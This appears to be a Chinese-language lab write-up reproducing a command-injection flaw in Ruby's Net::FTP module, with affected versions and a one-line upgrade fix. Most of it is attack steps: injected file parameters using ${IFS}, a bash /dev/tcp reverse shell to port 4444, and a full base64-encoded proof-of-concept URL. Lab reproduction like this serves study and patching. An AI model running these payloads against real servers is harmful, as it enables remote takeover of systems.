漏洞描述:
Ruby 是一种开源的面向对象程序设计的服务器端脚本语言,在 20 世纪 90 年代中期由日本的松本行弘(まつもとゆきひろ/Yukihiro Matsumoto)设计并开发。在 Ruby 社区,松本也被称为马茨(Matz)。Ruby 可运行于多种平台,如Windows、MAC OS和UNIX的各种版本。
Ruby Net::FTP 模块是一个 FTP 客户端,在上传和下载文件的过程中,打开本地文件时使用了 open 函数。而在 ruby 中,open 函数是借用系统命令来打开文件,且没有过滤 shell 字符,导致在用户控制文件名的情况下,将可以注入任意命令。在Ruby 2.2系列的2.2.8及更早版本、Ruby 2.3系列的2.3.5及更早版本、Ruby 2.4系列的2.4.2及更早版本、Ruby 2.5系列的2.5.0-preview1以及在主干修订版r61242之前都存在该漏洞。
复现过程:
1.访问http://ip:port,出现如下页面,开始实验
2.在本机安装pyftpdlib模块
pip install pyftpdlib
3.启动ftp
python3 -m pyftpdlib -p 2121 -i 0.0.0.0
4.向目标机中创建1.txt文件,空格用${IFS}代替
/download?uri=ftp://ip:2121/&file=|touch${IFS}1.txt
5.主机监听
6.构造反弹shell
bash -i >& /dev/tcp/ip/4444 0>&1
7.对反弹shell进行base64编码
8.base64编码中的加号+要替换成%2B,否则浏览器会把+编码成空格,使得命令解码出错
9.构造poc,并运行poc
/download?uri=ftp://ip:2121/&file=|bash${IFS}-c${IFS}'{echo,YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA4LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}'
10.成功监听
如此即可继承Web服务器程序的权限,去执行系统命令或读写文件,通过反弹shell控制整个网站,甚至控制整个服务器。
修复建议:
1.升级版本。
好文链接
发表评论